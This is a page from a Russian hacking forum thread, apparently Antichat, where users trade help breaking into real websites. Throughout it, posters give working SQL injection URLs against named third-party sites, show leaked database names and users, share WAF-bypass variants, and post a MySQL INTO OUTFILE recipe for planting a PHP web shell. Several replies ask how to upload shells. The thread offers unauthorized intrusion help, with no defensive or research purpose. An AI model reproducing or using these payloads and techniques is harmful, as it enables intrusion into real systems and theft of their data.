Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    Там /wp-content/plugins/module/
    а не /wp-content/themes/rttheme9/
    WordPress TimThumb Plugin
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    это бинари, скорей всего или собственная схема хеширования.

    Итальянской кодировки не бывает - есть кодировки, поддерживающие итальянский, они обычно встроены в браузер - вид->кодировка и выбираешь из списка.
     
  3. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    134
    Likes Received:
    26
    Reputations:
    5
    есть доступ к phpmyadmin на сервере, как можно залить шелл ?
     
  4. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.onanistblog.ru/wp-content/plugins/nextgen-gallery
    Не получается залить шелл :)
     
  5. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2[b]ERROR![/b]
    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1[b]Clean![/b]
    But Union Select does not work.

    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1
    Gives error, any solution?
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.kudosshowers.co.uk/gallery.php?id=-3+and+0+union+select+version()--+

    Open the source

    <img src="images/logo-5.1.41-3ubuntu12.10.jpg"
     
    _________________________
    1 person likes this.
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks a lot.

    Code:
    <tr><td colspan="4"><img src="images/logo-5.1.41-3ubuntu12.10.jpg" alt="Gallery" title="Gallery" /><td></tr>
    What about this?

    Code:
    http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+
     
  8. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1

    http://hcpoa.com/readnews.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2)%20)having+min(0)+or+1--+

    Duplicate entry '3.23.581' for key 1
     
    2 people like this.
  9. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Antichat has taught me so much now.

    Thanks for the fix.
     
  10. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Всем привет!)
    товарищи, которые работают с sql injections.
    посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(
     
  11. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    136
    Reputations:
    37
    Дорк и далее
    MySQLi мне оч помогает
    ссыль не даю ( в л.с)
     
  12. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться
    http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка
    и
    http://www.greenbergresearch.com/index.php?ID=1 тоже самое

    никак не могу обойти фильтрацию
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Code:
    http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex([COLOR=Green]database()[/COLOR])),14--+f
    
    Warning: main(/var/www/html/inc/templates/[COLOR=Yellow]greenbergdevDB[/COLOR]): failed to open stream: No such file or directory in /var/www/html/index.php on line 195
    
    http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex([COLOR=Green]user()[/COLOR])),14--+f
    
    Warning: main(/var/www/html/inc/templates/[COLOR=Yellow]greenbergUser@localhost[/COLOR]): failed to open stream: No such file or directory in /var/www/html/index.php on line 195
     
    #18553 Ereee, 8 Dec 2011
    Last edited: 8 Dec 2011
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    zenon3

    тут мускул 3, поэтому ругается на обединение запросов
     
    _________________________
  15. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    Code:
    CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`
     
    1 person likes this.
  16. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?
    В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
    ну и пхп код сносит само собой
     
  17. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    help

    I have a WAF problem..

    Code:
    http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+
    Code:
    http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+
    But can't find vulnerable number!

    Any help?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+

    lightangel

    try to understand a principle of injection

    no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax
     
    _________________________
    #18558 Konqi, 9 Dec 2011
    Last edited: 9 Dec 2011
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks. Is this site vulnerable?

    Code:
    http://www.vidol.gov/dol_news.php?page=-3'
    And I did everything showing it's injectable.

    Problem is, I tried error based, only brings this error.
    Code:
    http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+page+number.
    Any help?
     
  20. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    lightangel, read this article:
    http://forum.antichat.ru/thread104591.html
    (about sql inj)
    and this: http://forum.antichat.ru/threadnav43966-1-10.html
     
Loading...
Thread Status:
Not open for further replies.